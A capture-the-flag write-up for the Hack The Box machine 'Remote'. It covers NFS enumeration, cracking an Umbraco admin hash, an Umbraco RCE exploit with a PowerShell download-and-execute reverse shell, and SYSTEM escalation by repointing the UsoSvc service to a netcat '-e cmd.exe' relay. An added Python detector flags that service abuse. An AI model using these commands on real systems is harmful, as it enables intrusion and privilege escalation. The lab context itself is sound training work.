Hack The Box - Remote


This box is really a good and easy one. There is a webpage running, and we can find a backup of the webpage on the NFS service. It contains a username and password, the web service has a CVE which helps to get a shell, and getting System is by Token Impersonation.

Link: https://www.hackthebox.eu/home/machines/profile/234

Let's begin with our initial Nmap scan.

Nmap Scan Results

21/tcp    open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp    open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp   open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
2049/tcp  open  mountd        1-3 (RPC #100005)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49678/tcp open  msrpc         Microsoft Windows RPC
49679/tcp open  msrpc         Microsoft Windows RPC
49680/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (92%), Microsoft Windows Vista SP1 (92%), Microsoft Windows Longhorn (92%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 Update 1 (91%), Microsoft Windows Server 2016 build 10586 - 14393 (91%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (91%), Microsoft Windows 10 1511 (90%), Microsoft Windows 10 1703 (90%), Microsoft Windows Server 2008 SP2 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 1m36s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-04-24T04:50:45
|_  start_date: N/A

FTP Enumeration

I did an anonymous login and there is nothing there.

root@w0lf:~# ftp
Connected to
220 Microsoft FTP Service
Name ( anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.

NFS Enumeration

Since port 2049 is open and the NFS service is running on it, there may be a share available.

root@w0lf:~/CTF/HTB/Boxes/Remote# showmount -e
Export list for
/site_backups (everyone)
root@w0lf:~/CTF/HTB/Boxes/Remote# mount ~/CTF/HTB/Boxes/Remote/mount
root@w0lf:~/CTF/HTB/Boxes/Remote# cd mount/
root@w0lf:~/CTF/HTB/Boxes/Remote/mount# ls
App_Browsers  App_Data  App_Plugins  aspnet_client  bin  Config  css  default.aspx  Global.asax  Media  scripts  Umbraco  Umbraco_Client  Views  Web.config

There is something called Umbraco.

What is Umbraco?

  • Umbraco is an open-source content management system platform for publishing content on the World Wide Web and intranets. It is written in C# and deployed on Microsoft based infrastructure.

So this must be what is running on the web server. Let's confirm this now.



There are a lot of files in the mounted share, so I searched for any important Umbraco files and found this.


It mentioned that a file called Umbraco.sdf must contain the user details.

It's not in a readable format, so I used strings.

root@w0lf:~/CTF/HTB/Boxes/Remote/mount/App_Data# strings Umbraco.sdf | less


I took the admin@htb.local hash and cracked it using CrackStation: admin@htb.local : baconandcheese


While searching about Umbraco I found there is an exploit available for version 7.12.4. Let's confirm whether this is the same version.

root@w0lf:~/CTF/HTB/Boxes/Remote/mount# cat Web.config | grep umbracoConfigurationStatus
		<add key="umbracoConfigurationStatus" value="7.12.4" />

Let's check whether this exploit works: https://github.com/noraj/Umbraco-RCE

root@w0lf:~/CTF/HTB/Boxes/Remote/Umbraco-RCE# python exploit.py -u admin@htb.local -p baconandcheese -i '' -c whoami
iis apppool\defaultapppool

It's working, so why don't we upload a reverse shell with Nishang. I used nishang/Shells/Invoke-PowerShellTcp.ps1 and copied it to my directory.

Getting a Shell

Step 1:

Started a Python HTTP server on my machine.

root@w0lf:~/CTF/HTB/Boxes/Remote# python -m SimpleHTTPServer
Serving HTTP on port 8000 ...

Step 2:

If we look at the shell script, it gives us some examples.

PS > Invoke-PowerShellTcp -Reverse -IPAddress -Port 4444

Above shows an example of an interactive PowerShell reverse connect shell. A netcat/powercat listener must be listening on 
the given IP and port.

I copied the example, changed it to my IP, and pasted it at the bottom of the file.


Step 3:

It's time to run the exploit:

python exploit.py -u admin@htb.local -p baconandcheese -i '' -c powershell.exe -a "IEX (New-Object Net.WebClient).DownloadString('')"


We got the shell, and the user flag is in C:\Users\Public.

Privilege Escalation

Uploaded PowerUp to the machine and found something interesting.


There is a CVE available for this service; you can refer to PayloadsAllTheThings, or you can also use the PowerUp AbuseFunction command to abuse it.

Following it, I uploaded nc.exe to the box.

certutil -urlcache -split -f
PS C:\Users\Public\Downloads> sc.exe stop UsoSvc
PS C:\Users\Public\Downloads> sc.exe config UsoSvc binpath= "C:\Users\Public\Downloads\nc.exe 5555 -e cmd.exe"
[SC] ChangeServiceConfig SUCCESS
PS C:\Users\Public\Downloads> sc.exe qc usosvc
[SC] QueryServiceConfig SUCCESS

        TYPE               : 20  WIN32_SHARE_PROCESS 
        START_TYPE         : 2   AUTO_START  (DELAYED)
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Users\Public\Downloads\nc.exe 5555 -e cmd.exe
        LOAD_ORDER_GROUP   : 
        TAG                : 0
        DISPLAY_NAME       : Update Orchestrator Service
        DEPENDENCIES       : rpcss
        SERVICE_START_NAME : LocalSystem
PS C:\Users\Public\Downloads> sc.exe start UsoSvc

We changed the binary path, so if we restart the service it will run my nc command.
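A defender-side check for the weakness abused above, added here as an example and not part of the original writeup: it parses `sc qc` output in the format shown and flags a service whose binary lives outside the Windows or Program Files directories, carries a netcat-style `-e cmd.exe` relay argument, or runs as LocalSystem with either problem. The sample output is constructed, and the trusted-directory list is an assumption to tune per host.

```python
import re

# Constructed sample in the `sc.exe qc` format shown above, after the binary
# path has been pointed at a netcat relay in a user-writable directory.
SAMPLE_QC = """\
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 2   AUTO_START  (DELAYED)
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\\Users\\Public\\Downloads\\nc.exe <listener-ip> 5555 -e cmd.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Update Orchestrator Service
        DEPENDENCIES       : rpcss
        SERVICE_START_NAME : LocalSystem
"""

# Assumed baseline: legitimate service binaries live under these directories.
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
# A "-e <...>cmd.exe" argument is the netcat-style shell relay seen above.
RELAY_ARGS = re.compile(r"\s-e\s+\S*cmd\.exe\b", re.IGNORECASE)
FIELD = re.compile(r"\s*([A-Z_]+)\s*:\s*(.*)$")

def parse_sc_qc(text):
    """Turn `sc qc` output into a dict of FIELD_NAME -> value."""
    fields = {}
    for line in text.splitlines():
        m = FIELD.match(line)
        if m:
            fields[m.group(1)] = m.group(2).strip()
    return fields

def audit_service(text):
    """Return a list of findings for one service's `sc qc` output (empty if clean)."""
    cfg = parse_sc_qc(text)
    binpath = cfg.get("BINARY_PATH_NAME", "")
    # The executable is the quoted segment if quoted, otherwise the first token.
    m = re.match(r'"([^"]+)"|(\S+)', binpath)
    exe = (m.group(1) or m.group(2)) if m else ""
    findings = []
    if exe and not exe.lower().startswith(TRUSTED_PREFIXES):
        findings.append(f"binary outside trusted directories: {exe}")
    if RELAY_ARGS.search(binpath):
        findings.append("netcat-style command relay arguments in binary path")
    if findings and cfg.get("SERVICE_START_NAME", "").lower() == "localsystem":
        findings.append("service runs as LocalSystem: next start yields SYSTEM")
    return findings

if __name__ == "__main__":
    for finding in audit_service(SAMPLE_QC):
        print("FINDING:", finding)
```

Run it over `sc qc <name>` output for every service on a host to catch a binary path that has been repointed the way UsoSvc was here.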

And I got the shell.


We Own the Root!